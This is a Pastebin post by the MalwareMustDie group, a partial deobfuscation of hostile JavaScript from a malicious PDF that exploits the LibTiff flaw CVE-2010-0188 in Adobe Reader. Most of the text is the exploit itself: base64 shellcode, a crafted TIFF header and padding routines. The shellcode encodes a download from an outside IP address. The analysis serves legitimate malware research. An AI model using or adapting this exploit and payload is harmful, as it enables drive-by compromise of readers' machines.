API tools faq
paste
Advertisement
MalwareMustDie

#MalwareMustDie - Suspected PDF 0day (new)w/detected LibTiff

MalwareMustDie
Jan 23rd, 2013
1,561
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.32 KB | None | 0 0
raw download clone embed print report
  1. // MalwareMustDie - suspected 0day analysis...
  2. // after some obfuscations, ending up to the below values..
  3. // can't get the value of fkyhifxmy() yet...
  4.  
  5.  
  6.  
  7. // another onfuscation data in here...
  8. //
  9. edlejemod = "6xe5HAMAAIs0JIn3VoA+XnQGrDS8quL6w+jk////4jHKqFTmvby8Bci/vLw1e08YQ1wxDLS/vLxU+L28vCsxI7y5vLzWtuHxszgsvLy86utU1728vNQ8vry87+tUhL28vDl8yL5XXNTdPWVzVA6+vLxDbIC6wKRUz728vIG8nLy8wbDvVBG8vLw5fMmiVwTvVNi8vLw5fMmujXzYN/ykN/yIgVi+vLzIZlcg6zVL1kPljXxAThIr4zyEvMi/Klc464181kPlQE7aE3v7Qoe8jbzj1Dy+vLzv61QHvLy81E5nyBFUO728vNQk0/OB7FQKvby81rzWQkNs6TVZ1ujllXDcMcCYnOuNfE8W4zHLrNb4M7qNZ9Q0Qg+qVLi+vLzr6u/v7+/v7+9DybRDbDX4mKDddX64vOk1WdaA5ZVw6zHAmLjt6418TxbjM7vWz9TSvN281M68ybw127BDybQz+6zURsYpWFS4vby81GFkkkDsVI+9vLzrQ2w/eLDjdX64vNTodhMtVCS9vLzW/NS8rLy81r3WvENsf+k1WVTkvby81NlT87nsVEG8vLyNde3tQ8msQ8mwQ8m07UNsdX6wvOk1WdROZ8gRVB68vLzUwvY/a+xUbby8vNa81Jm877wxsJhDybDtQ8m0Q2x1frS86TVZPVC0vry83I1n1MtXt51U1ry8vCrUsxui5epUJLy8vDHxQO3WtNZDQ2wtX/bU5tJnZ+pUPLy8vDHxRDEBREFDQ+3UvL68vOvWpUPJQENsLV+Z1HEwy03qVOe8vLxDi0Nsswq09dSOwrqc6lT0vLy87UOLQ2w3pDXgmKDddX/cjXzYN+yMN+6wN+6oN86UjUONfBD6OXzIsYDdwL6QnH1zsb17V1eHwJiYN/6sN67JZzX4mKDdfri83DfQmJg3+YA36LnEvVY39qQ35py9V1+I9TeIN71SjUONfEAQOHzIu31zsb17V0iHwJiUyV035pi9V9o3sPc35qC9Vze4N71UNfiYoN1+tLzU09K8vNTJztDR6FS/vLy85eV/1DLyslDUq3aX0lToQ0ND7FQ0Q0NDQ1zUq3aX0lT+Q0NDQ8iYuOxUzkNDQ364vGh0dHA6Ly83OC4xMTAuNjAuOTkvL29sZWdkZW15LnBocD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
  10.  
  11. function tblefdr(o, k){ // blah..
  12. while (o.length < k){
  13. o += o
  14. }
  15. return o.substring(0, k)
  16. }
  17.  
  18. fkyhifxmy(); <== the main
  19.  
  20. function fkyhifxmy(){ // PoC of Libtiff integer overflow in Adobe Reader and
  21. // Acrobat CVE-2010-0188 is detected here...
  22.  
  23. hboxwhkju = "o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEp0JASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyi0U8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==";
  24. neeynlkdi = "kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol";
  25. lfwfnldsc = "SUkqADggAACQ";
  26. eosjddjas = "kJCQ";
  27. vbnqhwdkk = "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////";
  28. function rvcorgs(){
  29. // mm = app.viewerVersion.toString(); // bypass this mm bullshit...
  30. // mm = mm.replace(".", "");
  31. // while (mm.length < 4){
  32. // mm += 0
  33. //}
  34. mm = 5110;
  35. ll = 10;
  36. return parseInt(mm, ll)
  37. }
  38. pxhnxcedi = rvcorgs(); // suspected parts..
  39. if (pxhnxcedi >= 8000){
  40. gjoegkdqt = lfwfnldsc;
  41. gjoegkdqt += tblefdr(eosjddjas, 2000);
  42. gjoegkdqt += edlejemod; // while feeding obfs data...
  43. gjoegkdqt += tblefdr(eosjddjas, 7736);
  44. gjoegkdqt += vbnqhwdkk;
  45. gjoegkdqt += (pxhnxcedi < 8201 ? hboxwhkju : neeynlkdi);
  46. esrmhkwko.rawValue = gjoegkdqt
  47. }
  48. return // won't burp a value.. must debug further in memory..
  49. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!